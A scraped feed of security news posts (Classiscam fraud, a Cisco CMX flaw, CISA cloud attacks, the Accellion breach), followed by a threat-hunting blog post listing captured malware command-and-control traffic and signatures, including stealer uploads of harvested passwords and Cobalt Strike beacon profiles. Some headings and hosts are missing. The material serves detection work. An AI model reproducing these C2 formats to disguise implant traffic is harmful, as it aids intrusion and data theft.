Chatbots also have shops where you can purchase accounts to various marketplaces, e-wallets, targeted mailings, and manuals, or even hire a lawyer to represent you in court.  

“So far, the scam’s expansion in Europe is hindered by language barriers and difficulties with cashing our stolen money abroad,” says Dmitriy Tiunkin, Head of Group-IB Digital Risk Protection Department, Europe. “Once the scammers overcome these barriers, Classiscam will spread in the West. The downside of popularity is competition among scammers, who sometimes frame each other without knowing it.” 

Fighting the Classiscam

In order to protect their brands from Classiscam, companies need to go beyond the simple monitoring and blocking approach. Instead, it is necessary to identify and block adversary infrastructure using AI-driven digital risk protection systems enriched with data about adversary infrastructure, techniques, tactics, and new fraud schemes. 


The recommendations for users are quite simple and include: 

·     Trust only official websites. Before entering your login details and payment information, double check the URL and Google it to see when it was created. If the site is only a couple of months old, it is highly likely to be a scam or a phishing page.

·      When using services for renting or selling new and used goods, do not switch to messengers. Keep all your communication in the official chat.

·      Do not order goods or agree to deals involving a prepaid transaction. Pay only after you receive the goods and make sure that everything is working properly.

·      Large discounts and unbelievable promotions may be just that: too good to be true. They are likely to indicate a bait product and a phishing page. Be careful.

About the author: Group-IB

Group-IB is a Singapore-based provider of solutions aimed at detection and prevention of cyberattacks and online fraud. The company also specializes in high-profile cyber investigations and IP protection services. 

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Classiscam)

The post Classiscam expands to Europe: Russian-speaking scammers lure Europeans to pages mimicking classifieds appeared first on Security Affairs.

Cisco addresses a High-severity flaw in CMX Software

Cisco addressed tens of high-severity flaws, including some flaws in the AnyConnect Secure Mobility Client and in its small business routers.

This week Cisco released security updates to address 67 high-severity vulnerabilities, including issues affecting Cisco’s AnyConnect Secure Mobility Client and small business routers (i.e. Cisco RV110W, RV130, RV130W, and RV215W). One of the flaws fixed by the tech giant, tracked as CVE-2021-1144, is a high-severity vulnerability that affects Cisco Connected Mobile Experiences (CMX), which is a smart Wi-Fi solution that uses the Cisco wireless infrastructure to provide location services and location analytics for consumers’ mobile devices. CMX supports your organization’s Wi-Fi and mobile engagement and allows them to directly deliver content to smartphones and tablets that are personalized to visitors’ preferences and pertinent to their real-time indoor locations.

The vulnerability, which received a CVSS score of 8.8 out of 10, could be exploited by a remote authenticated attacker to change the password for any account user on affected systems.

“A vulnerability in Cisco Connected Mobile Experiences (CMX) could allow a remote, authenticated attacker without administrative privileges to alter the password of any user on an affected system.” reads the advisory published by Cisco.

“The vulnerability is due to incorrect handling of authorization checks for changing a password. An authenticated attacker without administrative privileges could exploit this vulnerability by sending a modified HTTP request to an affected device. A successful exploit could allow the attacker to alter the passwords of any user on the system, including an administrative user, and then impersonate that user.”

The flaw affects Cisco CMX releases 10.6.0, 10.6.1, and 10.6.2.

The vendor addressed the flaw with the release of 10.6.3 software version, it also informed customers that are no workarounds that address this issue.

Cisco also addressed a DLL Injection flaw, tracked as CVE-2021-1237, in Cisco AnyConnect Secure Mobility Client for Windows.

The flaw received a CVSS score of 7.8, attackers could exploit it to conduct a dynamic-link library (DLL) injection attack.

“A vulnerability in the Network Access Manager and Web Security Agent components of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to perform a DLL injection attack. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system.” reads the advisory.

“The vulnerability is due to insufficient validation of resources that are loaded by the application at run time. An attacker could exploit this vulnerability by inserting a configuration file in a specific path in the system which, in turn, causes a malicious DLL file to be loaded when the application starts. A successful exploit could allow the attacker to execute arbitrary code on the affected machine with SYSTEM privileges.”

Cisco also fixed a series of flaws in Small Business RV110W, RV130, RV130W, and RV215W Routers Management Interface that could lead remote command execution and denial of service attacks.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, CMX)

The post Cisco addresses a High-severity flaw in CMX Software appeared first on Security Affairs.

CISA warns of recent successful cyberattacks against cloud service accounts

The US CISA revealed that several recent successful cyberattacks against various organizations’ cloud services. 

The Cybersecurity and Infrastructure Security Agency (CISA) announced that several recent successful cyberattacks hit various organizations’ cloud services.

According to the agency, the attackers conducted phishing campaigns and exploited poor cyber hygiene practices of the victims in the management of cloud services configuration.

CISA has published a report that includes information collected exclusively from several CISA incident response engagements, these data are extremely precious because detail the tactics, techniques, and procedures used by threat actors and indicators of compromise (IOCs). Data in the Analysis Report is not explicitly tied to the supply chain attack on SolarWinds Orion Platform software.

“The cyber threat actors involved in these attacks used a variety of tactics and techniques—including phishing, brute force login attempts, and possibly a “pass-the-cookie” attack—to attempt to exploit weaknesses in the victim organizations’ cloud security practices.” reads the report published by CISA.

The US revealed that threat actors bypassed multi-factor authentication (MFA) authentication protocols to compromise cloud service accounts.

Attackers may have used browser cookies to defeat MFA with a “pass-the-cookie” attack ([T1550.004]).

Government experts confirmed that the threat actors initially attempted brute force logins on some accounts without success.

At least in one case, the attackers modified or set up email forwarding rules to redirect the emails to an account under their control.

Threat actors also modified existing rules to search users’ email messages (subject and body) for keywords that could allow them to identify messages containing sensitive data (i.e. Financial information) and forward them to their accounts.

“In addition to modifying existing user email rules, the threat actors created new mailbox rules that forwarded certain messages received by the users (specifically, messages with certain phishing-related keywords) to the legitimate users’ Really Simple Syndication (RSS) Feeds or RSS Subscriptions folder in an effort to prevent warnings from being seen by the legitimate users,” continues CISA.

The FBI also warned US organizations about scammers abusing auto-forwarding rules on web-based email clients in Business Email Compromise (BEC) attacks.

Last week, Cybersecurity and Infrastructure Security Agency (CISA) revealed that threat actors behind the SolarWinds supply chain attack also employed common hacker techniques to compromise the networks of the targeted organizations, including password guessing and password spraying.

CISA also added that inappropriately secured administrative credentials accessible via external remote access services were abused by the attackers.

CISA added that it is investigating incidents in which threat actors abused the Security Assertion Markup Language (SAML) tokens.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Golang-based worm)

The post CISA warns of recent successful cyberattacks against cloud service accounts appeared first on Security Affairs.

Smashing Security podcast #210: DC rioters ID’d, Energydots, and ransomware gets you in a pickle

Penile penal problems, identifying rioters in Washington DC, and can a sticker protect you from radiation? All this and much more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by The Cyberwire's Dave Bittner. And don't miss our featured interview with CrowdSec's Philippe Humeau.

Attackers targeted Accellion FTA in New Zealand Central Bank attack

The root cause for the hack of the New Zealand Central Bank was the Accellion FTA (File Transfer Application) file sharing service.

During the weekend, the New Zealand central bank announced that a cyber attack hit its infrastructure. According to the Government organization, one of its data systems has been breached by an unidentified hacker, commercially and personally sensitive information might have been accessed by the attackers.

According to Governor Adrian Orr the attack did not impact the bank’s core operations, anyway, it added that the security breach has been contained. In response to the incident, the affected system had been taken offline.

“We are actively working with domestic and international cyber security experts and other relevant authorities as part of our investigation. This includes the GCSB’s National Cyber Security Centre which has been notified and is providing guidance and advice,” the bank’s governor, Adrian Orr, said.

“We have been advised by the third party provider that this wasn’t a specific attack on the Reserve Bank, and other users of the file sharing application were also compromised.” “We recognise the public interest in this incident however we are not in a position to provide further details at this time.”

National authorities immediately launched an investigation into the incident with the help of cybersecurity experts.

According to the bank, threat actors compromised a service that stored commercially and personally sensitive information.

Early this week, the Reserve Bank of New Zealand confirmed that it uses Accellion FTA service to share information with external stakeholders.

“The Reserve Bank of New Zealand – Te Pūtea Matua continues to respond with urgency to a breach of a third party file sharing service used to share information with external stakeholders.” reads the press release published by the Reserve Bank.

The bank confirmed that a third party file sharing service provided by Accellion called FTA (File Transfer Application), which it was using, was illegally accessed in mid-December.

The bank is not providing additional information on the intrusion to avoid affecting the investigation.

According to Ancellion, less than 50 customers were affected by the flaw.

“In mid-December, Accellion was made aware of a P0 vulnerability in its legacy File Transfer Appliance (FTA) software. Accellion FTA is a 20 year old product that specializes in large file transfers.” reads the advisory published by the company. “Accellion resolved the vulnerability and released a patch within 72 hours to the less than 50 customers affected.”

Accellion pointed out that its enterprise content firewall platform, kiteworks, was not involved in any way.

“While Accellion maintains tight security standards for its legacy FTA product, we strongly encourage our customers to update to kiteworks, the modern enterprise content firewall platform,for the highest level of security and confidence,” concludes the US-based vendor.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, New Zealand)

The post Attackers targeted Accellion FTA in New Zealand Central Bank attack appeared first on Security Affairs.

C2 Traffic Patterns: Personal Notes

Detection is a key point in threat hunting. During the past few weeks, stright in the middle of the winter “holidays” (well, maybe if you live in a place where no COVID-19 lockdown was involved), many people re/started a studying program on cybersecurity. Some of them wrote to me asking if there is a way to detect common malware infections through network traces. So I thought it was a nice idea to share some personal and quick notes on that topic.

BTW The short answer is: Yes there is a way. So it makes sense to trace Malware traffics for studying purposes, but also to find patterns for network detections in real environments.

First of all you need to build your own laboratory, you might decide to build a dual VM systems, in which VM1 is the victim machine and VM2 is the traffic sniffer or you might decide to have a single victim machine and the main host sniffing and analyzing traffic streams. This is actually my favourite choice: a single MV called “victim” where I detonate malwares and the main host (the real machine in which the victim is virtualized) where the traffic tools are run. You need to create a certificate and manke it trusted from the victim machine in order to facilitate the SSL inspection. But this is not a post on how to build your own laboratory, if you are interested on building your own Malware laboratory the following 2 links are great starting points:

  • Christophe wrote a very nice starting post on it: HERE
  • Byte-Atlas followed on the topic showung how to harden the machine to reduce Malware Evasion: HERE

After you set up your own laboratory you are ready to start your tracking process. Following some personal notes on my “network traceing days”. Please note the following collection is a mix-up of personal traced network traffic (and already published on gists/reports/repositories/pastebins etc) and the one I found from different friends/posts/reports/repositories as well during the past years.

Traffic Patterns

The following paragraphs describe traffic traces captured by executing in a controlled environment some of the most known malware untill now. Please note that I’ve taken descriptions from Malpedia for reading convenience.


A .NET based keylogger and RAT. Logs keystrokes and the host’s clipboard, it finally beacons this information back to the C2. It has a modular infrastructure, following some of the traffic grabs for the following modules:


POST /zin/WebPanel/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv: Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Content-Length: 308
Expect: 100-continue
Connection: Keep-Alive

HTTP/1.1 100 Continue



<html>Time: 11/25/2019 17:48:57<br>User Name: admin<br>Computer Name: VICTIM-PC<br>OSFullName: Microsoft Windows 7 Professional <br>CPU: Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz<br>RAM: 4095.61 MB<br><hr>URL:<br><br>


From: office@xxx.]com
To: officelogs@xxx[.]com
Date: 12 Oct 2019 17:58:19 +0100
Subject: admin/VICTIM-PC Recovered Cookies
Content-Type: multipart/mixed;

Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: quoted-printable

Time: 10/12/2019 11:58:13<br>UserName: admin<br>ComputerName: VICTI=
M-PC<br>OSFullName: Microsoft Windows 7 Professional <br>CPU: Int=
el(R) Core(TM) i5-6400 CPU @ 2.70GHz<br>RAM: 3583.61 MB<br>IP: 18=<hr>


AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit. The following network trace is of one of the most relevant POST action taking back pattern with many “/”

POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Content-Length: 103
Cache-Control: no-cache


Buer Loader

Buer is a downloader sold on underground forums and used by threat actors to deliver payload malware onto target machines. It has been observed in email campaigns and has been sold as a service since August 2019.


Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 12 Nov 2019 20:00:24 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive


Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 12 Nov 2019 20:00:24 GMT
Content-Type: application/*
Content-Length: 2109952
Connection: keep-alive
Last-Modified: Tue, 12 Nov 2019 19:32:38 GMT
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Apple-iPhone7C2/1202.466; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543 Safari/419.3
Content-Length: 1046


Cobalt Strike

Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named ‘Beacon’ on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.

The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.

Following a general profile

GET /Mdt7 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; NP06)
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Wed, 16 Nov 2019 02:13:32 GMT
Content-Type: application/octet-stream
Content-Length: 213589


GET /push HTTP/1.1
Accept: */*
Cookie: TwJl1o2Nzk3+xmC39FsNTbyJPGHyNxllFZ8wZUwR831SYmTwrxoGydXQGF1ej89K1t0rTLgzjd95c8127hlZ6SQ4hx95YrYuRHooitXYGEAxtbKv53LJ6K+6r1y1OQU3n0+O93xxPiyx6RvPeKzlACbO4nEc5YKzh0vAfWJvlm0=
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENXA)
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Wed, 16 Nov 2019 02:017:31 GMT
Content-Type: application/octet-stream
Content-Length: 0

Following Amazon C2 profile (from external sources)

GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1
Accept: */*
Cookie: skin=noskin;session-token=MM4bZQ5WUPUrn7TPQuCWct6G+WGXZaLdezMQVEv8PHnB7tnvTk7ct3W71pQmn2NMJQD7IFbjPnKJV27tKshA8AjgzpXoeUtOIrDiBEg0x3AesYq52s74IbjnsVA+wASo0D6L23fd87XNDUiBro5wNBzcybUOADAO1fjCobw5MAw=csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Fri, 13 Dec 2019 17:48:39 GMT
Server: Server
x-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo=
X-Frame-Options: SAMEORIGIN
Content-Encoding: gzip
Content-Length: 0

Following a safebrowsing profile (from external sources)

GET /safebrowsing/ref/eNKSXUTdWXGYAMHYg2df0Ev1wVrA7yp0T-WrSHSB53oha HTTP/1.1
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip
Cookie: PREF=ID=foemmgjicmcnhjlacgackacadbclcmnfoeaeeignjhiphdgidlmahkgbchcahclpfcadjnegckejpiofbmllpnaeancgbikcdjohkekapgnkgiijobnknkgiahmkcjipnncehcamnopcmlngcboppjdplhhobhgekdcblgpkdggeklenpcabdkhhhaedogkacljhdgdphfanfbmcbnkgjmplhdkomllhnnoppchchejooiplahpgpmfaegdcpbnd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Content-Encoding: gzip
Age: 1609
Alternate-Protocol: 80:quic
Cache-Control: public,max-age=172800
Content-Type: application/
Date: Fri, 22 Nov 2019 13:34:50 GMT
Server: ECAcc (frb/67BC)
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 82480


Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker.

It looks like TLS traffic, but it really isen’t. The matching flag is on “24 01 00 00” pattern and following 24 byte first packet. (external take)

00000000  24 01 00 00 00 00 00 00 e5 7c 00 00 00 00 00 00    $....... .|......
00000010  09 7e 00 00 00 00 00 00                            .~...... 


DarkComet is one of the most famous RATs, developed by Jean-Pierre Lesueur in 2008. After being used in the Syrian civil war in 2011, Lesuer decided to stop developing the trojan. Indeed, DarkComet is able to enable control over a compromised system through use of a simple graphic user interface. Experts think that this user friendliness is the key of its mass success.


Dridex loader

OxCERT blog describes Dridex as “an evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet, if the malware cannot reach one server it will try another. For this reason, network-based measures such as blocking the C&C IPs is effective only in the short-term.”
According to MalwareBytes, “Dridex uses an older tactic of infection by attaching a Word document that utilizes macros to install malware. However, once new versions of Microsoft Office came out and users generally updated, such a threat subsided because it was no longer simple to infect a user with this method.”
IBM X-Force discovered “a new version of the Dridex banking Trojan that takes advantage of a code injection technique called AtomBombing to infect systems. AtomBombing is a technique for injecting malicious code into the ‘atom tables’ that almost all versions of Windows uses to store certain application data. It is a variation of typical code injection attacks that take advantage of input validation errors to insert and to execute malicious code in a legitimate process or application. Dridex v4 is the first malware that uses the AtomBombing process to try and infect systems.”

GET /function.php?3b3988df-c05b-4fca-93cc-8f82af0e3d2b HTTP/1.1
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2019 20:32:12 GMT
Content-Type: application/octet-stream
Content-Length: 455830
Connection: keep-alive
Keep-Alive: timeout=60
Accept-Ranges: bytes
Content-Disposition: attachment; filename=5dc1dc4cd884c.pdf

Content-Length: 3442
Connection: Close
Cache-Control: no-cache

v..jq..........G.0vR...@ ..6tw..<.{It.y


While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.
It is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.

The following trace is an external trace not updated to the last versions

POST /mult/tlb/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Length: 468
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Oct 2019 13:38:33 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 148
Connection: keep-alive

.^ta.I..Z .._AJ*..=._...5-...F.L{>...`.c.....~.|.h...@.E...2.Z|U..W..M....b......X.FA....x.....\.j?/C......{pi.b....Cz......>D..yQ........G.q...4?..


FormBook is yet another Stealer malware. Like most stealer malware, it performs many operations to evade AV vendors when deploying itself on a victim’s machine. And of course as we see with UrsnifHancitor, Dridex and other trojans, there are many variants with more than one way to receive the payload.

In the past year the threat actor’s favorite method of distributing FormBook has been via malspam and the use of CVE-2017-8570, using an .RTF file format with malicious code to exploit this vulnerability.

Patter suggestion. Host name is almast always “www” driven 😉

POST /k9m/ HTTP/1.1
Connection: close
Content-Length: 3769
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate



According to X-Force research, the new banking Trojan emerged in the wild in September 2017, when its first test campaigns were launched. Researchers noted that IcedID has a modular malicious code with modern banking Trojan capabilities comparable to malware such as the Zeus Trojan. At this time, the malware targets banks, payment card providers, mobile services providers, payroll, webmail and e-commerce sites (external take)

GET /photo.png?id=0181B9BACBCF3080870000000000FF40000001 HTTP/1.1
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: openresty
Date: Wed, 16 Oct 2019 15:30:33 GMT
Content-Type: application/octet-stream
Content-Length: 605211
Connection: keep-alive
Last-Modified: Tue, 08 Oct 2019 11:43:19 GMT
ETag: "5d9c7657-93c1b"
Accept-Ranges: bytes

IHDR..............N.T....sRGB.........gAMA......a....	pHYs..........o.d.	;.IDATOLrEV.....Le.D|...Rp.{..D...g`...a@.\8,E


The author described LaZagne as an open source project used to retrieve lots of passwords stored on a local computer. It has been developed for the purpose of finding these passwords for the most commonly-used software. It is written in Python and provided as compiled standalone binaries for Linux, Mac, and Windows.

POST /te.php HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------58748130728276
User-Agent: Mozilla/5.0 Gecko/20100115 Firefox/3.6
Content-Length: 1526
Cache-Control: no-cache

Content-Disposition: form-data; name="userfile"; filename="admin-MM-PC-passwords.txt"

########## User: admin ##########

------------------- Firefox passwords -----------------

[+] Password found !!!
Password: testpassword

------------------- Outlook passwords -----------------

[-] Password not found !!!
Account Name:
POP3 User:
POP3 Server:
u'Delivery Store EntryID: \x00\x00\ua138\u10bb\ue505\u1a10\ubba1\x08\u2a2b\uc256\x00\u736d\u7370\u2e74\u6c64l\x00\x00\u494e\u4154\ubff9\u01b8\uaa00\u3700\u6ed9\x00\x00C:\\Users\\admin\\Documents\\Outlook Files\\\x00'
SMTP Secure Connection: 0
SMTP Server:
Mini UID: 224868084
'Delivery Folder EntryID: \x00\x00\x00\x00\x81 \xa1\x9f\x92\x06>N\x9c\xc7t\xd9H\xba>f\x82\x80\x00\x00'
u'clsid: \u457b\u3444\u3537\u3134\u2d31\u3042\u3644\u312d\u4431\u2d32\u4338\u4233\u302d\u3130\u3430\u3242\u3641\u3736\u7d36'
Display Name: test Mail.
POP3 Password: testpassword.
u'Leave on Server: \u3139\u3537\u3730'

------------------- Google chrome passwords -----------------

[+] Password found !!!
Password: testpassword

[+] 3 passwords have been found.
For more information launch it again with the -v option

elapsed time = 2.4423969775


HTTP/1.1 200 OK
Date: Tue, 15 Sept 2019 12:08:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 1
Content-Type: text/html; charset=UTF-8


Netwire is a RAT, its functionality seems focused on password stealing and keylogging, but includes remote control capabilities as well. Keylog files are stored on the infected machine in an obfuscated form. Nice to spot in “41 00 00 00 99” pattern on initial packet.

00000000  41 00 00 00 99 80 3a e0 e8 5f d7 ea 8c af 76 cc   A.....:. ._....v.
00000010  c4 cc ad 5a 10 72 cc d0 5e 64 d8 50 80 fc b6 e6   ...Z.r.. ^d.P....
00000020  54 25 bf e0 ea 7f 7b e4 ff 54 70 e8 eb c0 fa 80   T%....{. .Tp.....
00000030  a0 a0 f3 a0 b0 0a 94 04 84 31 7c 3f e7 8c 90 c5   ........ .1|?....
00000040  ce c4 11 97 d9                                     .....


Ostap is a commodity JScript downloader first seen in campaigns in 2016. It has been observed being delivered in ACE archives and VBA macro-enabled Microsoft Office documents. Recent versions of Ostap query WMI to check for a blacklist of running processes.

Following a network trace externally found

POST /angola/mabutu.php?pi=29h&tan=cezar&z=662343339&n=0&u=20&an=9468863238 HTTP/1.1
Connection: Keep-Alive
Content-Type: text/plain; Charset=UTF-8
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Content-Length: 1034

Microsoft Windows 7 Professional 6.1.7601*Locale:0409
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sent64.jse

System Idle Process*null
WINWORD.EXE*C:\Program Files\Microsoft Office\Office14\WINWORD.EXE


RSA describes PlugX as a RAT (Remote Access Trojan) malware family that is around since 2008 and is used as a backdoor to control the victim’s machine fully. Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system.

POST /update?wd=b0b9d49c HTTP/1.1
Accept: */*
x-debug: 0
x-request: 0
x-content: 61456
x-storage: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache


GET /EF003AAB6425775CD949B40C HTTP/1.1
Accept: */*
Cookie: QhTbeUW+YzYYsZWz0PQvBvYIgo8=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; SLCC2;)
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 203 
Server: nginx
Date: Tue, 02 October 2019 17:32:40 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 660
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Server: ip-172-31-28-245
Set-Cookie: JSESSIONID=4618E9008B004BEE8FE5C81AB063A332; Path=/; HttpOnly


Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult. Interesting pattern flag on “40 00 00 00”, 68 data bytes on first packet. (external source)

00000000  40 00 00 00 3e 83 58 08 ad d1 05 8d 77 20 53 1f   @...>.X. ....w S.
00000010  dc 2e e8 99 0a f3 f1 bb 3a 8c c2 a1 9d 72 4a 69   ........ :....rJi
00000020  e6 60 97 da 1e 76 87 16 91 f2 1b c4 f4 89 f9 8a   .`...v.. ........
00000030  20 5b 19 e5 7c ae ed f1 b4 5a d2 ce 5f 86 17 20    [..|... .Z.._.. 
00000040  c6 b3 03 8c   


The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as,,, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body. The following net trace is an external take

Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 299

..+.........O..`...4..A..wT.F...XM&2.^.Y................E.4	W`.......(.....<,.zK..>c..^...p......n.z"]....\S,[.
......qV4`..Pu*...8W.........M .h.v.S.:.


A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.The following trace is an external take.

      << 200 OK 224b
      << 200 OK 12b
      << 200 OK 937b
      << 200 OK


In 2006, Gozi v1.0 (‘Gozi CRM’ aka ‘CRM’) aka Papras was first observed.
It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula. In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka ‘Gozi ISFB’ aka ‘ISFB’ aka Pandemyia). This version came with a webinject module.

POST /images/wsF0B4sp/ZaYjjdVgt73Q1BSOy_2Fofi/qF_2BfPTuK/5Ha_2F0xEvmbSfT_2/FluJ8ZF_2Fx8/g6xkZAZrZwN/2skHgzv92i_2BS/uPf4RDQvATKCgx0GZ5gez/ph_2BLcscLQkKDVw/HGZ6zA6DhGCqgPD/VTX09Q_2FUWIFyWps1/nfJ0I3rIZ/QNKbXjeu7xXa3W_2FZSX/bcWtE2zC4RafXFoRlqL/4EC4YHwclzkXrfX/58a3.bmp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=36775038942641984568
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Content-Length: 399

Content-Disposition: form-data; name="upload_file"; filename="78C6.bin"

\.\..V.]:.o..<]......H..)E.J=x...e%3..U.@.f......].tZ..1....g..OzC.5v.?o.NL...;..)..E.G.a~.....M#;.Cu;N/.3\$....x.....R....e..5.....-mW,..	..C................n.G.|..k0...@...?I.Iu......9k^.U6tzT9.b.3....#..V.4].La....zL.h+...aa..H.D.....Ar.......3.w.<.!.-.....|F9! 3.....7

A Review of Ransomware in 2020

As if dealing with COVID-19 were not enough, 2020 turned out to be a banner year for another troublesome strain of virus— ransomware. Malicious actors grew more sophisticated, daring and brutal. They also hit a number of high-profile targets. For those of you who didn’t keep up with all of the developments in the ransomware […]… Read More

The post A Review of Ransomware in 2020 appeared first on The State of Security.

SUNBURST Additional Technical Details

